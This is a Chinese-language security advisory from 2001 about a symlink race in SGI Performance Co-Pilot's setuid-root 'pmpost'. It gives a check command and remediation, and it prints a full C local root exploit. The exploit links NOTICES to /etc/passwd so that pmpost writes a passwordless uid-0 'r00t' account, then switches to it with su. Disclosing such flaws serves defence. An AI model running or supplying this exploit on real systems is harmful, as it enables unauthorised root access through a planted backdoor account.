SGI Performance Co-Pilot pmpost 存在符号连接漏洞发布时间:2001-06-22 更新时间:2001-06-22 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 SGI Performance Co-Pilot 2.2详细描述 Performance Co-Pilot (PCP)是一套支持系统级性能监视的服务,原属 IRIX产品,现在SGI公开了源码,其中PCP中的一个工具'pmpost'一般以 setuid root的身份默认安装,当写'NOTICES'文件在它用户定义的LOG 目录时,'pmpost'会导致一次符号连接攻击,由于写的数据由用户提供, 所以就存在可能获得ROOT权利。要测试IRIX时候存在漏洞,你可以运行如 下命令: strings /usr/pcp/bin/pmpost | grep PCP_LOG_DIR 如果'PCP_LOG_DIR'显示,就表示'pmpost'存在此漏洞。 测试代码 /******************************************************** * * * pmpost local root exploit * * vulnerable: pcp <= 2.1.11-5 * * by IhaQueR * * * ********************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <sys/stat.h> main() { const char *bin="/usr/share/pcp/bin/pmpost"; static char buf[512]; static char dir[128]; srand(time(NULL)); sprintf(dir, "/tmp/dupa.%.8d", rand()); if(mkdir(dir, S_IRWXU)) _exit(2); if(chdir(dir)) _exit(3); if(symlink("/etc/passwd", "./NOTICES")) _exit(4); snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir); if(putenv(buf)) _exit(5); if(!fork()) { execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL); _exit(1); } else { waitpid(0, NULL, WUNTRACED); chdir(".."); sprintf(buf, "rm -rf dupa.*"); system(buf); execl("/bin/su", "/bin/su", "r00t", NULL); } } 解决方案 临时方法是去掉'pmpost'的SETUID位。 或者下载最新版本2.2.1-3: SGI Performance Co-Pilot 2.2: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.9: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.8: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.7: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.6: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.5: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.4: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.3: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.2: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.11: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.10: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz SGI Performance Co-Pilot 2.1.1: SGI upgrade Performance Co-Pilot 2.2.1-3 http://oss.sgi.com/projects/pcp/download/pcp-2.2.1.tar.gz 相关信息 |
